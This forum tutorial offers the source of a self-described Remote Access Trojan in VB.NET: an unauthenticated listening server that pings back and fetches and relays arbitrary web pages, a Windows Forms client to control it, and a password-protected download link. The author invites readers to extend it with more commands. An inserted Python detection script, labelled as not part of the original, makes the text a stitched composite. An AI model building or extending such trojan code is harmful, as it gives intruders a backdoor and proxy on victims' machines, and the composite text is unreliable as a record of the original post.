Short for Remote Access Trojan: a Trojan horse that provides the intruder, or hacker, with a backdoor into the infected system. This backdoor allows the hacker to snoop on your system, use your infected system as a zombie to launch attacks on other systems, or even run malicious code.
I decided to create such a program in vb8 Express Edition, to point out the power of the .net library. I must say that my program (actually a client/server pair) could be implemented in C# as well. These days (in my opinion) the choice between C# and VB is not a dilemma any more. The underlying framework (.net 2.0 - 3.5) resolves any difficulties.
About the server:
It listens on a specific port for a client command.
Available commands:
If the first letter of the packet sent by the client is "1" then this is considered a "ping" request. So, the server responds with "I'm here baby!"
If the first letter of the packet sent by the client is "2" then this is considered an HTTP request. So, the server accesses the specified page and sends the web response to the client as an html page.
About the client:
Sends commands to the server and receives its responses.
Available commands:
If the first letter of the packet sent by the client is "1" then this is considered a "ping" request
(i.e. the "R u there" checkbox must be checked!). The server should answer with "I'm here baby!"
If the first letter of the packet sent by the client is "2" then this is considered an HTTP request. The server accesses the specified page and sends the web response to the client as an html page. The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
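As an added example (not part of the original post), here is detection logic a defender could run over reassembled TCP sessions to spot this client/server pair on a network, keyed on the fixed strings the two programs exchange (the ping reply is quoted with the apostrophe that the forum rendering mangled into "REM"). The session record format and the sample sessions are constructed for the example.

```python
from typing import List, Tuple

# Fixed strings taken from the post's server and client sources.
PING_REPLY = b"I'm here baby!"
UNKNOWN_REPLY = b"Ops... I dont know this command!"
CLIENT_PING = b"1.Is anybody there?"

# One reassembled TCP session: ("c2s" | "s2c", payload) in wire order (constructed format).
Message = Tuple[str, bytes]


def scan_session(messages: List[Message]) -> List[str]:
    """Return the indicator names observed in one session, in order.

    Requests are cut at the first NUL, mirroring what the server does
    before it looks at the command letter.
    """
    findings: List[str] = []
    last_request = b""
    for direction, payload in messages:
        if direction == "c2s":
            last_request = payload.split(b"\x00", 1)[0]
            if last_request == CLIENT_PING:
                findings.append("client-ping-string")
        elif direction == "s2c":
            if payload.startswith(PING_REPLY) and last_request[:1] == b"1":
                findings.append("ping-handshake")
            elif payload.startswith(UNKNOWN_REPLY):
                findings.append("unknown-command-reply")
            elif (last_request[:1] == b"2"
                  and last_request[1:].lower().startswith((b"http://", b"https://"))):
                # The server relays whatever page it fetched, so the request shape is the signal.
                findings.append("url-fetch-relay")
    return findings


# Constructed sample sessions (not real captures).
SAMPLE_PING = [("c2s", b"1.Is anybody there?"), ("s2c", b"I'm here baby!")]
SAMPLE_FETCH = [("c2s", b"2http://intranet.example/index.html"),
                ("s2c", b"<html><body>hello</body></html>\r\n")]
SAMPLE_BENIGN = [("c2s", b"GET / HTTP/1.1\r\nHost: intranet.example\r\n\r\n"),
                 ("s2c", b"HTTP/1.1 200 OK\r\n\r\n<html></html>")]

if __name__ == "__main__":
    for name, session in (("ping", SAMPLE_PING), ("fetch", SAMPLE_FETCH), ("benign", SAMPLE_BENIGN)):
        print(name, scan_session(session))
```

The fixed reply strings are the strong indicators; the "2" + URL request shape alone is weaker and is only reported once a response follows it in the same session.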
You can download the full project, from
http://rapidshare.co...0212384/RAT.zip
Password: p0wnbox.com
The program uses .net framework 2.0 and above.
I have tested the server on Windows XP Pro (with .net 2.0), Windows XP Pro (with .net 3.5) and Windows 7 Home Premium. I have tested the client on Windows 7. The client/server pair has been tested in a LAN as well as in a virtual machine environment.
You can use this program in any way you like, except for lamer (aka stupid) purposes. A reference to the author of the program, or any other remark or any kind of laudation, is not necessary. This is a tutorial, so the scope is the knowledge and only the knowledge. Our "HowToBeFamous" dept was closed a long time ago...
I strongly suggest that you extend it to handle new commands. It is very easy!
I bet that you're gonna use it for educational purposes ONLY.
Am I right?
Thnx... I appreciate it!
PS: Any remarks and/or/xor suggestions would be greatly welcome...
The server code:
' *********************************************************************
' A simple remote access server.
' It listens at a specific port for a client command.
' Available commands:
' 1. If the first letter of the packet sent by the client is "1" then this is considered a "ping" request.
'    So, the server responds with "I'm here baby!"
' 2. If the first letter of the packet sent by the client is "2" then this is considered an HTTP request.
'    So, the server accesses the specified page and sends the web response to the client as an html page.
'
' © by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
' Greetz to p0wnbox team @ www.p0wnbox.com
'
'
' REMARKS:
' You can get this program and extend it to handle any commands you want.
' I bet that you gonna use it for educational purposes ONLY. Am I right? ;)
' thx... I appreciate!
' *********************************************************************
Imports System.Net.Sockets
Imports System.Net
Imports System.Text
Imports System.IO

Class TCPSrv
    ' Largest client command we read (bytes). A command is read with a single Read call.
    Const BUFFER_SIZE As Integer = 8000

    Shared Sub Main(ByVal args As String())
        ' Must listen on the correct port - must be the same port the client connects to.
        Dim portNumber As Integer = 8000 ' My default port.
        Dim serverIP As IPAddress = IPAddress.Parse("127.0.0.1") ' My default IP.
        Dim i As Integer = 0
        ' If arguments exist then use them, overwriting the defaults.
        While i < args.Length
            Select Case args(i)
                Case "/p" ' Port flag parameter. If not entered, port 8000 will be used.
                    i += 1 ' Skip to the actual port parameter.
                    portNumber = Integer.Parse(args(i))
                Case "/h" ' Host IP flag parameter. If not entered, IP 127.0.0.1 will be used.
                    i += 1 ' Skip to the actual IP parameter.
                    serverIP = IPAddress.Parse(args(i))
            End Select
            i += 1 ' Skip to the next argument.
        End While
        Dim tcpListener As New TcpListener(serverIP, portNumber)
        Try
            tcpListener.Start()
            Console.WriteLine("Server is listening on {0}:{1}...", serverIP, portNumber)
            ' Note: nothing authenticates the peer; any host that can reach this port can issue both commands.
            While True
                ' Wait for a client to connect.
                Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
                Console.WriteLine("Connection accepted.")
                ' Get the stream.
                Dim networkStream As NetworkStream = tcpClient.GetStream()
                ' Read the client command into an 8k buffer. It can't be bigger ;)
                Dim bytes(BUFFER_SIZE - 1) As Byte
                Dim bytesRead As Integer = networkStream.Read(bytes, 0, BUFFER_SIZE)
                ' Decode only the bytes actually received, and cut the command at the first NUL.
                Dim clientdata As String = Encoding.ASCII.GetString(bytes, 0, bytesRead)
                Dim iPos As Integer = InStr(clientdata, Chr(0))
                If iPos > 0 Then clientdata = Left(clientdata, iPos - 1)
                ' According to the packet (its 1st letter) sent by the client we answer.
                If clientdata.Length = 0 Then
                    ' The client closed the connection without sending a command.
                    Console.WriteLine("Empty request; ignoring.")
                ElseIf clientdata.Substring(0, 1) = "1" Then ' Command #1: "R u up" request.
                    Dim responseString As String = "I'm here baby!"
                    Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                    networkStream.Write(sendBytes, 0, sendBytes.Length)
                ElseIf clientdata.Substring(0, 1) = "2" Then ' Command #2: A web request.
                    ' I consider the web request command as: "2http://www.google.com",
                    ' so I send the command to the "gotoWeb" function w/o its first letter.
                    Dim sTheURL As String = clientdata.Substring(1)
                    TCPSrv.gotoWeb(networkStream, sTheURL)
                Else
                    ' Unhandled command request found!
                    Dim responseString As String = "Ops... I dont know this command!"
                    Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                    networkStream.Write(sendBytes, 0, sendBytes.Length)
                End If
                tcpClient.Close()
            End While
        Catch e As Exception
            ' A serious error occurred. Display its description on the console.
            Console.WriteLine(e.ToString())
        Finally
            tcpListener.Stop()
        End Try
    End Sub

    ' ***************************************************************************************
    ' This is a very simple function to access a web server (via HTTP), get the server response,
    ' store this response in a string and send it via TCP to the client.
    '
    Shared Sub gotoWeb(ByVal netStream As NetworkStream, ByVal sUrl As String)
        Dim sendBytes As [Byte]()
        Dim sWebHtmlResponse As String
        Try
            ' Create a 'WebRequest' object with the specified url.
            Dim myWebRequest As WebRequest = WebRequest.Create(sUrl)
            ' Send the 'WebRequest' and wait for the response.
            Dim myWebResponse As WebResponse = myWebRequest.GetResponse()
            ' Only HTTP responses carry a character set; other schemes fall back to the default encoding below.
            Dim sPageEncoding As String = ""
            Dim httpResponse As HttpWebResponse = TryCast(myWebResponse, HttpWebResponse)
            If httpResponse IsNot Nothing Then sPageEncoding = httpResponse.CharacterSet
            ' Call method 'GetResponseStream' to obtain the stream associated with the response object.
            Dim ReceiveStream As Stream = myWebResponse.GetResponseStream()
            ' If the operating system has the encoding of the web page then use it, otherwise use the default.
            Dim encode As Encoding
            Try
                encode = System.Text.Encoding.GetEncoding(sPageEncoding)
            Catch ex As Exception
                encode = System.Text.Encoding.Default
            End Try
            ' Pipe the stream to a higher level stream reader with the required encoding format.
            Dim readStream As New StreamReader(ReceiveStream, encode)
            Dim read(256) As Char
            ' Read 256 characters at a time.
            Dim count As Integer = readStream.Read(read, 0, 256)
            sWebHtmlResponse = ""
            While count > 0
                ' Append the characters just read to the string.
                Dim str As New [String](read, 0, count)
                sWebHtmlResponse += str
                count = readStream.Read(read, 0, 256)
            End While
            ' Add a new line to the webResponse string.
            sWebHtmlResponse += ControlChars.CrLf
            ' Release the resources of the stream object.
            readStream.Close()
            ' Release the resources of the response object.
            myWebResponse.Close()
            ' Send the Html Response to the client in UTF-8 format.
            sendBytes = Encoding.UTF8.GetBytes(sWebHtmlResponse)
            netStream.Write(sendBytes, 0, sendBytes.Length)
        Catch ex As Exception
            ' Ops! An error occurred, inform the client about it!
            sendBytes = Encoding.ASCII.GetBytes(ex.Message)
            netStream.Write(sendBytes, 0, sendBytes.Length)
        End Try
    End Sub
End Class
...and the more important code fragment from the client:
' *********************************************************************
' A simple client.
' It sends commands to a specific port at a specific address.
' Available commands:
' 1. If the first letter of the packet sent by the client is "1" then this is considered a "ping" request
'    (i.e. the "R u there" checkbox must be checked!).
'    The server should answer with "I'm here baby!"
' 2. If the first letter of the packet sent by the client is "2" then this is considered an HTTP request.
'    The server accesses the specified page and sends the web response to the client as an html page.
'    The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
'
' © by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
' Greetz to p0wnbox team @ www.p0wnbox.com
'
'
' REMARKS:
' You can get this program and extend it to handle any commands you want.
' I bet that you gonna use it for educational purposes ONLY. Am I right? ;)
' thx... I appreciate!
' *********************************************************************
Imports System.Net.Sockets
Imports System.Text
Imports System.IO

Public Class Form1
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim tcpClient As New TcpClient()
        Dim sInformation As String
        ' Clear the pages.
        RichTextBox1.Clear()
        WebBrowser1.Navigate("about:blank")
        ' Inform the user about the request time.
        sInformation = "Client Requests @ " + DateTime.Now.ToString
        ListBox1.Items.Add(sInformation)
        Try
            ' NumericUpDown.Value is a Decimal; convert it explicitly to the port number.
            tcpClient.Connect(TextBox_IP.Text, CInt(NumericUpDown_Port.Value))
            Dim networkStream As NetworkStream = tcpClient.GetStream()
            If networkStream.CanWrite AndAlso networkStream.CanRead Then
                Dim sendBytes As [Byte]() = Nothing
                Dim s As String
                Dim i As Int32
                Dim bytes(tcpClient.ReceiveBufferSize - 1) As Byte
                If CheckBox_handshake.Checked = True Then
                    sendBytes = Encoding.ASCII.GetBytes("1.Is anybody there?")
                    networkStream.Write(sendBytes, 0, sendBytes.Length)
                    ' Read the NetworkStream into a byte buffer; decode only the bytes received.
                    i = networkStream.Read(bytes, 0, bytes.Length)
                    ' Output the data received from the host to the listbox.
                    s = Space(5) + Encoding.ASCII.GetString(bytes, 0, i)
                    ListBox1.Items.Add(s)
                    sInformation = "Server Respond @ " + DateTime.Now.ToString
                    ListBox1.Items.Add(sInformation)
                Else
                    ' Send the request to the server.
                    s = "2" + TextBox_URL.Text
                    sendBytes = Encoding.ASCII.GetBytes(s)
                    networkStream.Write(sendBytes, 0, sendBytes.Length)
                    ' Read the packet: the HTML page.
                    ' Loop to receive all the data sent by the server (Read returns 0 when the server closes).
                    ' Collect raw bytes first so that a UTF-8 character split across two reads decodes correctly.
                    Dim received As New MemoryStream()
                    i = networkStream.Read(bytes, 0, bytes.Length)
                    While (i <> 0)
                        received.Write(bytes, 0, i)
                        i = networkStream.Read(bytes, 0, bytes.Length)
                    End While
                    ' Translate the data bytes to a UTF-8 string.
                    s = Encoding.UTF8.GetString(received.ToArray())
                    ' Inform the user about the response time.
                    sInformation = "Server Respond @ " + DateTime.Now.ToString
                    ListBox1.Items.Add(sInformation)
                    ' Update the rich-text box with the HTML response.
                    RichTextBox1.Text = s
                    ' Write the HTML contents to a file and force the browser to read it.
                    ' The server-supplied HTML is rendered as-is from a local file; nothing sanitises it.
                    Dim sCurrentFilePath As String = Path.Combine(Environment.CurrentDirectory, "CurrentReadPage.htm")
                    Using sw As New StreamWriter(sCurrentFilePath, False, Encoding.UTF8)
                        sw.Write(s)
                    End Using
                    WebBrowser1.Navigate(sCurrentFilePath)
                End If
            Else
                If Not networkStream.CanWrite Then
                    ListBox1.Items.Add("Fail to write data to the stream.")
                ElseIf Not networkStream.CanRead Then
                    ListBox1.Items.Add("Fail to read data from the stream.")
                End If
            End If
        Catch ex As Exception
            ListBox1.Items.Add(ex.Message)
        Finally
            ' Always release the socket, whichever path was taken.
            tcpClient.Close()
        End Try
    End Sub
End Class